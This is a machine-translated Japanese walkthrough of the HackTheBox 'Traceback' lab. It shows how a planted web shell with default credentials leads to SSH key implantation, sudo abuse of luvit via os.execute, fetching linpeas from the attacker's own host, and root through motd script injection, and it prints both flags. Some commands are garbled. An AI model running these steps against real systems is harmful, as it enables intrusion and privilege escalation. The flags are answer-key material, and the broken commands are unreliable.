ボックスをハックトレースバック

この記事はハッキングtracebackのための私のガイドですHackTheBox.eu . これは私の最初のハッキングガイドです.
私はこの箱を楽しんだ.それは私のスキルレベルで右だったし、完了するまで約2時間かかった.
For ethical hacking , 使っているParrot Security Linux VMで動作する.
ターゲットボックスのIPアドレスを使用する代わりに、Tracebackという名前の/etc/hostsエントリを作成しました.HTB .この変更は、私はボックスのIPアドレスを覚えておく必要はありませんので、物事はずっと簡単になります.

sudo echo "10.10.10.181 >> /etc/hosts

nmap初期スキャン

nmap -A traceback.htb

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 14:43 CDT
Nmap scan report for traceback.htb (10.10.10.181)
Host is up (0.061s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.38 seconds

かなり単純なスキャン.webとsshが利用可能です.
Webサイトは次のようになります.

ウェブサイトのソースを表示すると、次のことがわかります.

うーん
私はグーグルをその文字列で探すことにしました.

私たちがヒットしたようです.私はこれらのシェルのいずれかがこのサーバーにインストールされているかどうかを確認するつもりです、ゴバスターのための時間.
私はGithubのシェルのリストを取り、シェルと呼ばれるテキストファイルにダンプしました.txt.サーバ上で見つけることができるかどうか確認しましょう.

さあゴブリンを火にしましょう

我々はヒットを得た!
ページをブラウザにロードしました.

http://traceback.htb/smevk.php

これがやってきた.

Githubのオリジナルのソースコードを見て、コードに埋め込まれたデフォルトのログインを見ることができます.

Username: admin
Password: admin

試してみましょう.

...中です.現在のユーザーはWebAdminです.WebAdminフォルダの周りを閲覧した後、私は/home/webadmin/に気づいた.sshフォルダは書き込み可能です.我々は、SSH経由でアクセスを得るために、認証キーファイルをキーでアップロードすることができます.sshを得ることは非常に役立つでしょう.
まず、sshキーを生成します.

ssh-keygen

では、公開鍵を認証キーにコピーしましょう.

cp traceback.pub authorized_keys

それでは、ウェブサイトでフォームをアップロードしましょう.

すごい、それはかかった.では、秘密鍵をchmodで使いましょう.

chmod 600 traceback

さあ箱に入れましょう

ssh -I traceback [email protected]

我々は!

rootとして走らせるプログラムがあるかどうか見てみましょう.

sudo -l

ああ、これは有望に見えます.私はLuvitを見つけました.

Luvitは、Luaのアプリケーションのように見えます.私は、Luaアプリケーションを利用することができるかどうかについて、GTFobinsに行きました.

そして、我々の戦略は、ここにあります.最初に実行しました.

sudo -u sysadmin /home/sysadmin/luvit

アプリケーションは、私に何かを入力するよう求めました.私はgtfobinsから得たコマンドに入力しましたが、shの代わりにbashを使用しました.

os.execute("/bin/bash -i")

今、私はsysadminと最初のフラグへのアクセスを持っている!

11dadca21fe54bc8d753f61fc7a47ada

それでは、ルートを得ることができます.
私はダウンロードlinpeas.SHからhere .

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

私はそれを直接箱に入れようとしたが、それはうまくいかなかった.

私はローカルの箱にダウンロードして、それをアップロードするためにパイソンのビルトインHTTPサーバを使用するつもりです.私はこれをlinpeasと同じフォルダーで実行しています.SHが入っている.

python -m SimpleHTTPServer

これで、リモートからの呼び出しによってアクセスできます.

wget http://10.10.14.26:8000/linpeas.sh

実行可能にしましょう

chmod +x linpeas.sh

さあ、linpeasを走らせましょう.sh

./linpeas.sh

出力をスクロールして、これに気付きました.

あなたがログインするとき、00ヘッダーはヘッダーメッセージであるようです:

私はWebAdminとしてログインするとき、私がそのシェルから「id」を走らせることができるかどうか見ることに決めました.コマンドは、スクリプトが実行されているときにPRIVが実行されているかを教えます.

echo "id" >> /etc/update-motd.d/00-header

ログインするとき、ユーザがそのファイルを実行しているかを出力しなければなりません.うまくいけばroot.

ブームルート!を、それを利用しましょう.rootフラグは常に/root/rootです.txt.

echo "cat /root/root.txt" >> /etc/update-motd.d/00-header

さあ、もう一度ログインしましょう.

そして、ルートフラグが表示されます.

b2a2c50f8f2c0d1acb6c0aaf090712c9

我々はすべて完了です!私たちは簡単に箱の上で実際のルートを得るためにそのexploitを使いました、しかし、私がこの活動のために必要としたすべては根の旗でした.この箱は楽しい!私は非常にそれをお勧めします.